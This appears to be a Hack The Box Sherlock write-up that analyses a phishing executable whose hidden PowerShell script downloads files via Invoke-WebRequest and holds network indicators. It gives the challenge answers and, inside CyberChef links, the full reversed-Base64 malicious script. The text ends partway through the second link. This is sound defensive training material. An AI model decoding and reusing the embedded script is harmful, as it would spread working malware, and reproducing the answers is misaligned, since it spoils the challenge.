# Heartbreaker-Continuum

## **Sherlock Scenario**

Following a recent report of a data breach at their company, the client submitted a potentially malicious executable file. The file originated from a link within a phishing email received by a victim user. Your objective is to analyze the binary to determine its functionality and possible consequences it may have on their network. By analyzing the functionality and potential consequences of this binary, you can gain valuable insights into the scope of the data breach and identify if it facilitated data exfiltration. Understanding the binary's capabilities will enable you to provide the client with a comprehensive report detailing the attack methodology, potential data at risk, and recommended mitigation steps.

{% embed url="<https://app.hackthebox.com/sherlocks/Heartbreaker-Continuum>" %}

***

## Setting Up the Environment

First download the given file and unzip it. The password for the given file is `hacktheblue`.

<figure><img src="/files/ozvaJKWuT6Spb0J6y5Ee" alt=""><figcaption></figcaption></figure>

The zip file has a executable file named `Superstar_MemberCard.tiff.exe`.

***

## **Task 1**

### Question

To accurately reference and identify the suspicious binary, please provide its SHA256 hash.

### Solution

I used `PeStudio` to get the SHA256 hash of the given executable. You can download `PeStudio` from the following link: <https://www.winitor.com/download>.

Once you opened the given exeuctable in `PeStudio` by going to `File` -> `Open`, you can find the SHA256 hash under the `footprints` tab of `PeStudio`.

<figure><img src="/files/RTb1RSXzt8mMJYckP7NZ" alt=""><figcaption></figcaption></figure>

**Answer:** `12DAA34111BB54B3DCBAD42305663E44E7E6C3842F015CCCBBE6564D9DFD3EA3`

***

## **Task 2**

### Question

When was the binary file originally created, according to its metadata (UTC)?

### Solution

You can find the creation date of the given executable under the `file-header` tab of `PeStudio`.

<figure><img src="/files/B3TdmLH3QZHxw38FFuI0" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
Make sure that you enter the answer in the following format: `YYYY-MM-DD HH:MM:SS`.
{% endhint %}

**Answer:** `2024-03-13 10:38:06`

***

## **Task 3**

### Question

Examining the code size in a binary file can give indications about its functionality. Could you specify the byte size of the code in this binary?

### Solution

Usually in a executable / PE file, the code is written under the `.text` section. You can find the details of the `.text` section of the given executable under the `sections` tab of `PeStudio`.

<figure><img src="/files/RZwtIzkCuOxr6D33Zs1l" alt=""><figcaption></figcaption></figure>

**Answer:** `38400`

***

## **Task 4**

### Question

It appears that the binary may have undergone a file conversion process. Could you determine its original filename?

### Solution

You can find the original file name before the conversion process under the `resources` tab of the `PeStudio`.

<figure><img src="/files/CF9uEszFTb4cKSAyikZq" alt=""><figcaption></figcaption></figure>

**Answer:** `newILY.ps1`

***

## **Task 5**

### Question

Specify the hexadecimal offset where the obfuscated code of the identified original file begins in the binary.

### Solution

To identify the hexadecimal offset of the obfuscated code I used `HxD` in my case. You can download `HxD` from the following link: <https://mh-nexus.de/en/hxd/>.

{% hint style="info" %}
You can also get the hexadecimal offset of the obfuscated code from the `location` column of the `newILY.ps1` file under the `resources` tab of the `PeStudio`.
{% endhint %}

<figure><img src="/files/BHATUwIJi0JW7VmTvY6U" alt=""><figcaption></figcaption></figure>

Set the number of bytes to show as `4` as shown in the above image to get the exact offset.

**Answer:** `2C74`

***

## **Task 6**

### Question

The threat actor concealed the plaintext script within the binary. Can you provide the encoding method used for this obfuscation?

### Solution

I used `FLOSS` to extract all the strings in the given executable. You can download `FLOSS` from the following link: <https://github.com/mandiant/flare-floss/releases/tag/v3.1.0>.

{% hint style="info" %}
You can also use the Sysinternals `strings.exe` to do the same: <https://learn.microsoft.com/en-us/sysinternals/downloads/strings>
{% endhint %}

<figure><img src="/files/Ne0Cp1E5F7icRfD20Lq1" alt=""><figcaption></figcaption></figure>

From the output of floss you can find the obfuscated code as shown in the following image.

<figure><img src="/files/mRgLIWYvce6w8TTRaJDJ" alt=""><figcaption></figcaption></figure>

The code is obfuscated using the `Base64` algorithm and after obfuscation the code is reversed. I used to `CyberChef` to reverse the above code and decoded the `Base64` algorithm to the get the actual code.

{% embed url="<https://gchq.github.io/CyberChef/>" %}

<figure><img src="/files/2qxLYFUFVe3J6CNxvv7R" alt=""><figcaption></figcaption></figure>

You can use the following link to see the output in the above image in realtime.

```url
https://gchq.github.io/CyberChef/#recipe=Reverse('Character')From_Base64('A-Za-z0-9%2B/%3D',true,false)&input=PT1nQ05VMll5OW1SdEFTWnpKWGRqVm1VdEFpY3BSRWRsZG1jaFJISmdnR2RoQlZMZzBXWjBsVUxsWjNidFZtVUswUVpqSjNiRzFDSWxObmMxTldaUzFDSW9SWFlRUjNZaEpIZDRWMGRrQUNhMEZHVXRBU2JsUlhTdFVtZHYxV1pTcFFESzBRZkswUUtvUW1ibE5sTHRWR2RKeFdhaDFHSmdBQ0lnb1FEc3hXZHVSQ0krQVNLb3dHYkJWbWRzOTJjbEpsTHpSbmJsbEdjcE5XWlM1U2JsUlhTc2xXWXRSQ0lnQUNJSzBnQ04wSElnQUNJSzB3UURKRWJ2cGpPZFZHYzVSRmR1Vldhd2wyWWxKRmJwRldUczlrTHI5MmJzUlhkUDVDY3ZKWFowNVdTdVUyWXBabVpQNUNkbTkyY3ZKM1lwMTBXZzBESWxCWGVVNUNkdVZXYXdsMllsSjFZakpHSmdBQ0lnQUNJZ0FpQ05raUl6TlhaeVJHWkJCQ2JwRldiRkppTDBOV1kwNTJialJDS2tSV1F1TUhkdVZXYXdsMllsSmxMdFZHZEp4V2FoMUdKZzBESTA1V1pwQlhhalZtVWpObVlrQUNJZ0FDSWdBQ0lLMHdlZ2t5YzBOV1kwNTJialJDSXVsR0kwTldZMDUyYmpSQ0tnZzJZaFZtY3ZaR0lnQUNJSzBnQ05BaU1nMERJMEZXYnk5bVI1UjJiQzVTYmxSWFNzbFdZdFJDSWdBQ0lLMEFic1ZuYmtBaVBna3ladGxHSm9RR1pCNXljMDVXWnRoMlloUkhkQjVTYmxSWFNzbFdZdFJDSWdBQ0lLMFFlazltUXMxR2RvUkNJOUFTZWs5bVFzMUdkSTVTYmxSWFNzbFdZdFJDSWdBQ0lLMGdJdTRTWmpsR2R2NUdJc3gySjE5V2VnUVdaek4zYnlOR0l6SlhabjVXYUdKQ0k5QUNkalZtYWlWM1V1MFdaMGxFYnBGV2JrQUNJZ0FpQ05rQ01vMFdaMGxVWjBGV1p5TmtMcjkyYnNSWGR2UkNJOUFTYmxSWFNzbFdZdFJDSWdBQ0lLMEFhMEZHVWx4V2FHWjNjalJDSW9SWFlRMUNJMk4zUXRRbmN2QlhiSkJTUGdNSGRqRkdkdTkyWWtBQ0lnQWlDTm9RRHU5V2EwRldieTltWnVsVVp3bEhWdjVVTGdnR2RoQlZac2xtUjJOM1lrQUNhMEZHVXRBaWR6TlVMMEozYndoWFJnd0hJOUJDSWdBaUNOTUhjdkpIY2tBU2UwSlhadzltY1ExQ0kwTldacUoyVFRCRkkwTldacUoyVHRjWFpPQkNJZ0FDSWdBQ0lLMFFmZ0FDSWdBQ0lnQWlDTkFDSWdBQ0lnQUNJZ0FDSWdvUUR6TlhaeVJHWkJGRGJwRldiRjV5WGtBU1BnQXlKek5YWnlSR1pCQkNicEZXYkZkQ0lnQUNJZ0FDSWdBQ0lnQWlDTlVXYmg1RWJzVm5SdThGSmcwRElnQUNJZ0F5SmwxV1lPQkNic1ZuUm5BQ0lnQUNJZ0FDSWdBQ0lnb1FEN0JFSTlBeWN3OW1jd1JDSWdBQ0lnQUNJZ29RRDlCQ0lnQUNJZ0FDSUswQUlna0NNb1UyY3Z4MlF1OEZKZ0FDSWdBQ0lnQUNJZ0FDSUswd2VnUTNZbHBtWVAxQ2FqRldSeTltUmd3SEl5OUdkalZHY3o1V1MwVjJSdThGSmdBQ0lnQUNJZ0FpQ05zSEkwTldacUoyVHRnMlloVmtjdlpFSThCeWN0VkdkSjVpY2xSR2J2WjBjME5XWTA1MmJqUkNJZ0FDSUswZ0kyTjNZdU1IZGpGR2R1OTJRY0pYYUVSWFpuSlhZMFJpSWcwRElvUlhZUVZHYnBaa2R6TkdKZ0FDSWdvUURna0NNeGdpY2xSR2J2WkVkc1ZYWW1WR1IwVjJSdVUyWWhCM2NsMVdZdVJDSTlBaWNsUkdidlowYzBOV1kwNTJialJDSWdBQ0lLMFFLaWtFVUIxa0lvVTJZaEIzY2wxV1lPUlhaSDV5YXY5R2IwVjNia0FTUGdVMlloQjNjbDFXWXVSQ0lnQUNJSzBnYnZsR2RoTldhc0JIY0I1eWF2OUdiMFYzVGdRM1lscG1ZUDEyYkQxQ0kwTldacUoyVHRjWFpPQlNQZ3MyYnZ4R2QxOUdKZ0FDSWdvUURvUlhZUXQyYnZ4R2QxOUdKZ2dHZGhCVlpzbG1SdEF5Y3pWMll2SkhVdFFuY2hSM1VnQUNJZ29RRDdCU0tvUlhZUXQyYnZ4R2QxOUdKb0FpWnBwUURLMEFRaW9RRCt3V2IwaDJMOG9RRCtrSFp2SjJMOG9RRCtBM0w4NGljbFJYWXNCU1p5VkdhMEJTZHZsSEluNVdhbFYyY2c0MmJnY21icFJuYjE5MlErQUhQSzBnUHc5Q1B1Y21idnhHSXY5R2RnY21icFJYYWhkSEl1RkdhMEJpY2xoR2RoSkhJeVZtYnY5MmNnUVhhZ0lXWXlkR0l2UkhJME5YWmlCeWNuUVhhZzgyY2d3Q2RwQkNaaDlHYnVkM2JrQmliaE5HSTE5V2VnVW1jdlpXWmlCQ2RwMVdhc0JTWnRsR2RnRUdJemRTWnlWR2EwQkNMd1ZISXpSV1lsaEdJNXhHWnVWV2F5WkdJaEJDZHpWblNnNGlQaDlDUGxKWFpvNXpKbGhYWnVZbVpwUm5Ma0pYWURKWFppMVdaTjlsY2hSM2N5VkdjMU4xTHdBRE01b0ROMEVqTDNnVE11WURNeTRDTjA4eUw2QUhkMGgySjlZV1p5aEdJaHhESWx4bVlwTjNjbE4yWWhCQ0w1SkhkdVZHSXk5bVpnUW1jaE5HSXdsR2F6SlhaaTFXWnRCQ2JoUlhhbmxHWmdFR0lrVldadUJDYnNkU2R2bEhJc2tuYzA1V1pnNFdhaGRHSXZSbFB3eGpDTjREY3Z3REl1VTJZdVZXYXVWbWR1OTJZZ0lYZHZsSEl5OW1aZ0FYWXRCU1pvUkhJa1ZHYWpGR2QwRkdJbFozSkpCaUw1UlhhMmwyYzF4Mlk0VkdJazVXWWdrM1loWlhheUJISW05R0kwbG1ZZ0VHSTU5bWF1VkdJdUYyWWdVMmRnVW1jbGgyZGd3aVkxeDJZZ0FYYW9ObmNsSldibDFHSWxSWFkybG1jd0JTWWdRWFlnTVhkdlpuZWxSbWJsSkhJaEJpY3ZaR0lrVjJadUZtY3lGR0lsWjNKSjVEYzhvUUQrQTNMODR5Y3lWM2JvQmljbFJuWmhCQ2MxQkNkbFZXYmc4R2RnTVhkZ0kzYm1CU1oyOUdiZ1EySkpCQ0wwbEdJdlJISXVWR2N2QlNaeWRTZHZsSEltbEdJczgyVWc0U1pzRkdkZ00zY2x4V1p0bEdkZ0VHSXQ5bWNtQlNadVYyWXpCU1lnVTJhcHhHSTA1V1p0OVdiZ2cyWWhWR0luNVdhb05YYXlWR2FqQkNMMzlHYnpCeWNuNVdhb1JISW41V2FyRkdkZ1kyYmdrSGQxRldaaUJTWm9SSEl1bEdJbFpYWnB4V1ppQlNTZ3d5WnVsR2EwbG5jbFpYWmdnMloxOW1jb1JISW9OWGR5QmlibFJuWnZCU1ozQlNaeVZHYTNCQ1pzSjNiM0JTWWc0V1MrQUhQSzBnUHc5Q1B1UVhZb1JISWxkbWJoaDJZZzhHZGdVV2JwUkhJemRDZHBCQ1psUldhalZHWmdVbWRua0VJMFZuWWd3U2VzVkdkaHhHSWwxR0l1VldaaUJ5Y25RWFlvUkZJL0FYWjBOSEkwaFhadUJTWm9SSElsdFdZMEJ5YjBCQ1psUlhZMGwyY2xoR0kwVm5ZZ3dpY2haV1lnMDJieVpHSWw1MmJsMTJiekJ5WnVsbWNwMUdaaEJpYmxWbVlnVW1kblUzYjVCaWJsaDJkZ2NtYnB4V1psWkdJMEZHYTBCeWR2NTJhZ1UzYlpCaUwxOVdlZ2dHZHBkSElsSlhZb05ISXZSSEluNVdhMDVXWTNCaWJsVm1ZZ1VtZG5rRUluNVdhb1JYWnQ5MmNnTTNKbEpYWm9SSElsTlhkaE5XWmlCQ2QxOUdJbjVXYW9OV1lsSkhJdGRTU2c0eWNwaEdkZ1VXWnpCU2R2bEhJdVZHYTNCQ2RoVm1jbkJ5WnVsMmJrQlNaeWRTZHZsSElsQjNiSUJpUHd4REkrQTNMOEFDTDVWR1MrQUhQSzBnUDVSMmJpeGpDTjREWmhWR2F2d2pDTjRUWnNsSGR6OUNQSzBRZmdBQ0lnb1FEN1lXYXlWMmN0TW5iaE5ISXNrbWNpbEdiaE5FSTZrSGJwMVdZbTFDZHU5bVpnQUNJZ29RRDdCU2VrOW1ZZ0FDSWdvUUQrVUdiNVIzYzhvUUQrUVdZbGhHUEswZ1BzMUdkb3hqQ040RGJ0UkhhZ1VFVVpSMVFQUlVJOG9RRGlBRUk5QVNlazltUXMxR2RvUmlDTm9RRGwxV1lPeEdiMVpFSTVSbmNsQjNieUJGWnVGR2M0VlVMZ0VESTBObmNwWlVMZ1EzWWxwbVlQMUNkalZHYmxORkk4QlNaekpYZGpWbVV0QWlJRmhWUnVzMFRQeEVWVjlrSWdJWFoweFdhRzFDSWlVMllwWm1aUEJDZG05MmN2SjNZcDFFWHpWR2JwWkVJdEZtY245bWNReGxPREpDSW9SWFlRMUNJdFZHZEpSR2JwaDJRdFFYWkhCU1BnQUNhMEZHVXI5MmJzUlhkdlJpQ05vUURLMHdkdlJtYnBkMWRsNTBiTzFDSTBsV1lYMUNJaUlDWW9SWFlRTkhKaUFXUDBCWGF5TjJjdklDSTBOWGFNUm5ibDFXZG5KWFF0QUNhMEZHVWxoWFIzUkNJb1JYWVFWR2JwWlVMZ00zY2xOMmJ5QlZMMEpYWTBObENOVTJZeTltUnRBQ2EwRkdVelJDSW9SWFlRVkdicFpVTGdVR2JwWlVMMFYzVGd3SElBSmlDTlFYYTRWbUNOVTJjdngyWUswZ0lnaEdkaEJWWjJsR2FqSlhZa0lDWWdRWGR3cFFEcTBUZWx0R2R6OUdhdEF5TDRNVE11WWpOdWtqTng0U056QTBJdEVEVEgxMmFMWlRhaE1rSjQwa09sTldhMkpYWno5eUw2QUhkbU5ISXVWR2N2cFFEaUFrQ05JQ2Q0Um5MMEJYYXlOMlVsTm1iaDVXWjA1V2FoMUdYb1JYWVFSM1loSkhkNFYwZGtJQ0k5QUNhMEZHVXpSaUNOSVNidk5tTFFOMFV1bDJWY2hHZGhCRmRqRm1jMGhYUjNSaUlnMERJb1JYWVFWR2VGZEhKSzBnQ05VMll5OW1SdEFDYTBGR1UwTldZeVJIZUZkSEpnZ0dkaEJsYnZsR2RoNVdhME5YWkUxQ0lseFdhR0JYYWFkSEpnZ0dkaEJWTGdVbWRwaDJZeUZVTGs1V1l3aFhSSzB3WnVsMmN5RkdVamwyY2hKVVp6VlZMZ1VHYnBaRWNwcDFka0FTWnNsbVIwVjNUdEFDYnlWRmNwcDFka0FTYXlWVkxnSUNkbGQyVmlBQ2R1VjJaQkpYWnpWVkxnUTNjbFZYY2xKbFlsZFZMbHQyYjI1V1NLMGdDTkl5Y3M5MmJVMXlhelZHUnd4V1pJeDFZcHhtWTFCRlh6SlhaelZGWDZNa0lnMERJb1JYWVFSM1loSkhkNFYwZGtvUURpQVhhNjVDVURObGJwZEZYeWxHUjBWMlp5Rkdka0lDSTlBU1pzbG1Sd2xtVzNSaUNOSUNjcHBuTHQ5Mll0SVhZa0ZtYzBaMmJ6OVZac0pXWTBKM2J3MUNjak5uYnBkM0x3OGljME5YYWs5U1pzSldZMEozYncxQ2NqTm5icGQzTHpSM1kxUjJieUIzTGpsR2RoUjNjdjAyYmo1aWNoUldZeVJuWnZObkx6VjNMdm96Y3dSSGRvSkNJOUFDYnlWRmNwcDFka29RREswQUlsTm1jdlpVTGdnR2RoQlZaMmxHYWpKWFlrQUNhMEZHVXU5V2EwRm1icFIzY2xSVUxnSVhhRVJYWm5KWFkwUkNJb1JYWVExQ0lsWlhhb05tY0IxeWN6Vm1jdzEyYkRwUURpQVhhNjVTWnRGbWIwTjNib1JDWHlsR1IwVjJaeUZHZGtJQ0k5QUNhMEZHVWxaWGFvTm1jaFJpQ05jU1oxNVdhMDUyYkRsSGIwNVdac2wyVW5BU1BnVTJZdVZtY2xaV1p5QjFjelZtY245bWNRUmlDTlUyWXk5bVJ0QVNLblFIZTA1eWJtNVdhUWQwSmdJWGFFUlhabkpYWTBSQ0lvUlhZUTFpYnA5bVNvQUNhMEZHVWx4V2FHMUNJbHhXYUcxQ2QxOUVJOEJpY3ZBQ2RzVjNjbEpIY25wUURsTm1jdlpVTGdreUowaEhkdThtWnVsV1p5RkdhVGRDSXlsR1IwVjJaeUZHZGtBQ2EwRkdVdDRXYXZwRUtnZ0dkaEJWWnNsbVJ0QVNac2xtUnRRWGRQQkNmZ1VtY2hoMlVpMTJVdFFYWkhwUURLMFFmZ0FDSWdvUUQ5QkNJZ0FDSWdBQ0lLMFFaakozYkcxQ0lvUlhZUTUyYnBSWFl1bEdkelZHWmtBaWJ2bEdkaDVXYTBOWFpFMUNJbDFXWU94R2IxWmtMZlJDSW9SWFlRMUNJdFZHZEoxU2V3OTJRZ0FDSWdBQ0lnQUNJZ0FDSUswd2Vna0NhMEZHVXU5V2EwRm1icFIzY2xSR0pnVW1idEFTWnRGbVRzeFdkRzV5WGtnQ0ltbEdJZ0FDSWdBQ0lnb1FEZ0FDSWdBQ0lnQWlDTlVXYmg1a0xmUkNJeWxHUjBWMlp5Rkdka0FDYTBGR1V0NFdhdnBFSTlBQ2EwRkdVdTlXYTBGbWJwUjNjbFJHSmdBQ0lnQUNJZ0FpQ05zSEkwTldacUoyVHRnMlloVmtjdlpFSWdBQ0lLMEFmZ2NTWjE1V2EwNTJiRGxIYjA1V1pzbDJVbkFpYnZsR2RqRmtjdkpuY0YxQ0lsTm1jdlpVTGdRM2NweEVkNFZHSmdVR1oxeDJZdWxVTGdVMmN5VjNZbEpWTGdJWGFFaDJZeUZXWnpSQ0l0VkdkSlJHYnBoMlF0UVhaSEJTUGd3R2IxNUdKSzBBSWdBQ0lnQUNJZ0FDSWdBQ0lLMGdJME4zYnVvaUlnd2lJblIyYnVvaUlnd2lJd1IyYnVvaUlnd2lJelIyYnVvaUlnd2lJMFIyYnVvaUlnQUNMaVEzY3c1aUtpQUNMaXdXYmw1aUtpQUNMaWMyY3Q1aUtpQUNMaWdIZHZSbUxxSUNJc0lDZTB4R2V1b2lJZ0FDSWdBQ0lnQUNJZ0FDSUswQUlzSUNlMDlHY3VvaUlnd2lJMFoyYnE0aUlnd2lJMk4zWXVvaUlnd2lJbVJHY3VvaUlnd2lJNFJIY3c1aUtpQUNMaVFIY3c1aUtpQUNMaWczY3NobkxxSUNJc0l5Y3NobkxxSUNJc0lDZWo5R1p1b2lJZ3dpSWo5R1p1b2lJZ0FTUGdRM2NweEVkNFZHSkswZ0NOMG5DTlVXZHVsR2R1OTJRNXhHZHVWR2JwTkZJdTlXYTBOV1F5OW1jeVZVTGdVMll5OW1SdEF5YXY5R2IwVjNUZ1VXYmg1VUxnTTNjbE4yYnlCVkx3OUdkVEJDSWdBaUNOc0hJcFVXZHVsR2R1OTJRNXhHZHVWR2JwTkZJdTlXYTBOV1F5OW1jeVZVTGdzMmJ2eEdkMTlFSWwxV1lPMUNJek5YWmo5bWNRMUNkbGRFS2dZV2FLMGdDTlUyWXk5bVJ0QVNLblFIZTA1eWNsTjNjbE4yYnlCbGNsTlhWbkFpY3BSRWRsZG1jaFJISmdnR2RoQlZMdWwyYktoQ0lvUlhZUVZHYnBaVUxnVUdicFpVTDBWM1Rnd0hJa2wwY3pWMll2SkhVZ3dTWnRGbVR6TlhaajltY1FCQ2RqVm1haTlVTDBOV1pzVjJVZ3dISXpWMmN6VjJZdkpIVXlWMmNWUm5ibEpuYzFOR0pLMGdDTjBuQ04wSElnQUNJSzBBSWdVMmNzRm1aa0FDSWdBQ0lnQUNJSzB3ZWdnMlkwRjJZZzBISWdBQ0lLMGdjbE5YVjA1V1p5SlhkalJDSXhWV0xnSVhaelZsTHBnaWNsNTJkUFJYWkg1eVhrQUNJZ0FDSWdBQ0lLMHdlZ2tuYzBCQ0lnQWlDTnNISTBOV1pxSjJUdFVtY2xoMlZnd0hJek5YWmo5bWNROWxNejRXYVhCQ2RqVm1haTlVYXRkVkwwVjJSZzBESXpWMmN6VjJZdkpIVXlWMmNWUm5ibEpuYzFOR0pLMGdDTlUyWXk5bVJ0QVNLblFIZTA1eWJtNVdhV0YwSmdJWGFFUlhabkpYWTBSQ0lvUlhZUTFpYnA5bVNvQUNhMEZHVWx4V2FHMUNJbHhXYUcxQ2QxOUVJOEJDYnNWbmJrNGpNZ1VXZHNGbWR2QUNWRmRFSTBOV2RrOW1jUU5YZHlsbVZwUm5iQkJDU1VGRVVnSWpjbFJuYmxOVWUwbG1jMU5XWlR4RmR2OW1jY3hsT0ZOVVFRTlZSTkZrVHZBeVlwMTJkSzBRWmpKM2JHMUNJcGNDZDRSbkx6SlhaelZIYmhOMmJzZENJeWxHUjBWMlp5Rkdka0FDYTBGR1V0NFdhdnBFS2dnR2RoQlZac2xtUnRBU1pzbG1SdFFYZFBCQ2ZnUW5iMTkyWWpGa2NsTlhWZkp6TXVsMlZnTTNjaHgyUXRBQ2RqVm1haTlVYXRkVkwwVjJSSzBRWmpKM2JHMUNJcGNDZDRSbkx2Wm1icE5FUm5BaWNwUkVkbGRtY2hSSEpnZ0dkaEJWTHVsMmJLaENJb1JYWVFWR2JwWlVMZ1VHYnBaVUwwVjNUZ3dISXN4V2R1UmlQeUFpVEpGVVRQUmtVRk5WVjZZbmJsUmlPalJHZGxkMmNrOUNJME5YWjB4bWJLMGdDTlUyWXk5bVJ0QVNLblFIZTA1U1p0Rm1ieVYyYzFkQ0l5bEdSMFYyWnlGR2RrQUNhMEZHVXQ0V2F2cEVLZ2dHZGhCVlpzbG1SdEFTWnNsbVJ0UVhkUEJDZmdJWFp6VkZkdVZtY3lWM1lrb1FESzBRZkswQWJzVm5UdFFYZFBCQ2ZnVTJZeTltUnRBaWNwUkVkbGRtY2hSSEpnZ0dkaEJWTGdrbmN2UjNZbEpYYUVCU1p3bEhWdFZHZEoxQ0l0VkdkSjF5ZGw1RUlnQUNJSzB3ZWdrU0t5Vm1icEZHZHU5MlFnVUdjNVJGYTBGR1V0QWljcFJFZGxkbWNoUkhKZ2dHZGhCVkxnZ0dkaEJWTDBOWFpVaENJMDltYnRnQ0ltbG1DTm9RRGlNWFpzbG1SZ01XYXNKV2RReDFZcHhtWTFCRlh6SlhaelZGWDZNa0lnMERJeWxHUjBWMlp5Rkdka29RRGlNbmNsTlhWY3B6UWlBU1BnSVhhRWgyWXlGV1p6UmlDTm9RRG4xV2FrQXljelYyWXZKSFV0UW5jaFIzVUswd1p0bEdKZ1VHYnBaRWQxOVVMZ3dtYzFSQ0lwSlhWdEFDZHpWV2R4Vm1VaVYyVnRVMmF2Wm5iSnBRREswZ0ltWldhMDVDWnlGMlF5Vm1ZdFZXVGZKWFkwTm5jbEJYZFR4MWNrRjJiczUyZHZSRVh5VjJjVlJuYmxKbmMxTkdKY05uY2xOWGRjcHpRaUFTUGdjV2JwUmlDTklpWm1sR2R1UW1jaE5rY2xKV2JsMTBYeUZHZHpKWFp3VjNVdkFETXdrak8wUVRNdWNET3g0aU53SWpMMFF6THZvRGMwUkhhaUFTUGd3bWMxUmlDTlVVVEI1a1VGTlZWNlluYmxSQ0k5QWljbE5YVjA1V1p5SlhkalJpQ05VVVRCNWtVRlJWVlExMFREcGpkdVZHSmcwRElsMVdZdVIzY3ZoR0o&oeol=CRLF
```

**Answer:** `Base64`

***

## **Task 7**

### Question

What is the specific cmdlet utilized that was used to initiate file downloads?

### Solution

You can find the cmdlet used in the decoded version of the obfuscated code as shown in the following image.

<figure><img src="/files/JbpSPyZge2IrW3kYs47b" alt=""><figcaption></figcaption></figure>

**Answer:** `Invoke-WebRequest`

***

## **Task 8**

### Question

Could you identify any possible network-related Indicators of Compromise (IoCs) after examining the code? Separate IPs by comma and in ascending order.

### Solution

You can filter the IP address and sort them as shown in the following image using `CyberChef`.

<figure><img src="/files/eYccuNUQqxUwK36nCXGV" alt=""><figcaption></figcaption></figure>

You can use the following link to see the output in the above image in realtime.

```url
https://gchq.github.io/CyberChef/#recipe=Reverse('Character')From_Base64('A-Za-z0-9%2B/%3D',true,false)Extract_IP_addresses(true,false,false,false,true,true)&input=PT1nQ05VMll5OW1SdEFTWnpKWGRqVm1VdEFpY3BSRWRsZG1jaFJISmdnR2RoQlZMZzBXWjBsVUxsWjNidFZtVUswUVpqSjNiRzFDSWxObmMxTldaUzFDSW9SWFlRUjNZaEpIZDRWMGRrQUNhMEZHVXRBU2JsUlhTdFVtZHYxV1pTcFFESzBRZkswUUtvUW1ibE5sTHRWR2RKeFdhaDFHSmdBQ0lnb1FEc3hXZHVSQ0krQVNLb3dHYkJWbWRzOTJjbEpsTHpSbmJsbEdjcE5XWlM1U2JsUlhTc2xXWXRSQ0lnQUNJSzBnQ04wSElnQUNJSzB3UURKRWJ2cGpPZFZHYzVSRmR1Vldhd2wyWWxKRmJwRldUczlrTHI5MmJzUlhkUDVDY3ZKWFowNVdTdVUyWXBabVpQNUNkbTkyY3ZKM1lwMTBXZzBESWxCWGVVNUNkdVZXYXdsMllsSjFZakpHSmdBQ0lnQUNJZ0FpQ05raUl6TlhaeVJHWkJCQ2JwRldiRkppTDBOV1kwNTJialJDS2tSV1F1TUhkdVZXYXdsMllsSmxMdFZHZEp4V2FoMUdKZzBESTA1V1pwQlhhalZtVWpObVlrQUNJZ0FDSWdBQ0lLMHdlZ2t5YzBOV1kwNTJialJDSXVsR0kwTldZMDUyYmpSQ0tnZzJZaFZtY3ZaR0lnQUNJSzBnQ05BaU1nMERJMEZXYnk5bVI1UjJiQzVTYmxSWFNzbFdZdFJDSWdBQ0lLMEFic1ZuYmtBaVBna3ladGxHSm9RR1pCNXljMDVXWnRoMlloUkhkQjVTYmxSWFNzbFdZdFJDSWdBQ0lLMFFlazltUXMxR2RvUkNJOUFTZWs5bVFzMUdkSTVTYmxSWFNzbFdZdFJDSWdBQ0lLMGdJdTRTWmpsR2R2NUdJc3gySjE5V2VnUVdaek4zYnlOR0l6SlhabjVXYUdKQ0k5QUNkalZtYWlWM1V1MFdaMGxFYnBGV2JrQUNJZ0FpQ05rQ01vMFdaMGxVWjBGV1p5TmtMcjkyYnNSWGR2UkNJOUFTYmxSWFNzbFdZdFJDSWdBQ0lLMEFhMEZHVWx4V2FHWjNjalJDSW9SWFlRMUNJMk4zUXRRbmN2QlhiSkJTUGdNSGRqRkdkdTkyWWtBQ0lnQWlDTm9RRHU5V2EwRldieTltWnVsVVp3bEhWdjVVTGdnR2RoQlZac2xtUjJOM1lrQUNhMEZHVXRBaWR6TlVMMEozYndoWFJnd0hJOUJDSWdBaUNOTUhjdkpIY2tBU2UwSlhadzltY1ExQ0kwTldacUoyVFRCRkkwTldacUoyVHRjWFpPQkNJZ0FDSWdBQ0lLMFFmZ0FDSWdBQ0lnQWlDTkFDSWdBQ0lnQUNJZ0FDSWdvUUR6TlhaeVJHWkJGRGJwRldiRjV5WGtBU1BnQXlKek5YWnlSR1pCQkNicEZXYkZkQ0lnQUNJZ0FDSWdBQ0lnQWlDTlVXYmg1RWJzVm5SdThGSmcwRElnQUNJZ0F5SmwxV1lPQkNic1ZuUm5BQ0lnQUNJZ0FDSWdBQ0lnb1FEN0JFSTlBeWN3OW1jd1JDSWdBQ0lnQUNJZ29RRDlCQ0lnQUNJZ0FDSUswQUlna0NNb1UyY3Z4MlF1OEZKZ0FDSWdBQ0lnQUNJZ0FDSUswd2VnUTNZbHBtWVAxQ2FqRldSeTltUmd3SEl5OUdkalZHY3o1V1MwVjJSdThGSmdBQ0lnQUNJZ0FpQ05zSEkwTldacUoyVHRnMlloVmtjdlpFSThCeWN0VkdkSjVpY2xSR2J2WjBjME5XWTA1MmJqUkNJZ0FDSUswZ0kyTjNZdU1IZGpGR2R1OTJRY0pYYUVSWFpuSlhZMFJpSWcwRElvUlhZUVZHYnBaa2R6TkdKZ0FDSWdvUURna0NNeGdpY2xSR2J2WkVkc1ZYWW1WR1IwVjJSdVUyWWhCM2NsMVdZdVJDSTlBaWNsUkdidlowYzBOV1kwNTJialJDSWdBQ0lLMFFLaWtFVUIxa0lvVTJZaEIzY2wxV1lPUlhaSDV5YXY5R2IwVjNia0FTUGdVMlloQjNjbDFXWXVSQ0lnQUNJSzBnYnZsR2RoTldhc0JIY0I1eWF2OUdiMFYzVGdRM1lscG1ZUDEyYkQxQ0kwTldacUoyVHRjWFpPQlNQZ3MyYnZ4R2QxOUdKZ0FDSWdvUURvUlhZUXQyYnZ4R2QxOUdKZ2dHZGhCVlpzbG1SdEF5Y3pWMll2SkhVdFFuY2hSM1VnQUNJZ29RRDdCU0tvUlhZUXQyYnZ4R2QxOUdKb0FpWnBwUURLMEFRaW9RRCt3V2IwaDJMOG9RRCtrSFp2SjJMOG9RRCtBM0w4NGljbFJYWXNCU1p5VkdhMEJTZHZsSEluNVdhbFYyY2c0MmJnY21icFJuYjE5MlErQUhQSzBnUHc5Q1B1Y21idnhHSXY5R2RnY21icFJYYWhkSEl1RkdhMEJpY2xoR2RoSkhJeVZtYnY5MmNnUVhhZ0lXWXlkR0l2UkhJME5YWmlCeWNuUVhhZzgyY2d3Q2RwQkNaaDlHYnVkM2JrQmliaE5HSTE5V2VnVW1jdlpXWmlCQ2RwMVdhc0JTWnRsR2RnRUdJemRTWnlWR2EwQkNMd1ZISXpSV1lsaEdJNXhHWnVWV2F5WkdJaEJDZHpWblNnNGlQaDlDUGxKWFpvNXpKbGhYWnVZbVpwUm5Ma0pYWURKWFppMVdaTjlsY2hSM2N5VkdjMU4xTHdBRE01b0ROMEVqTD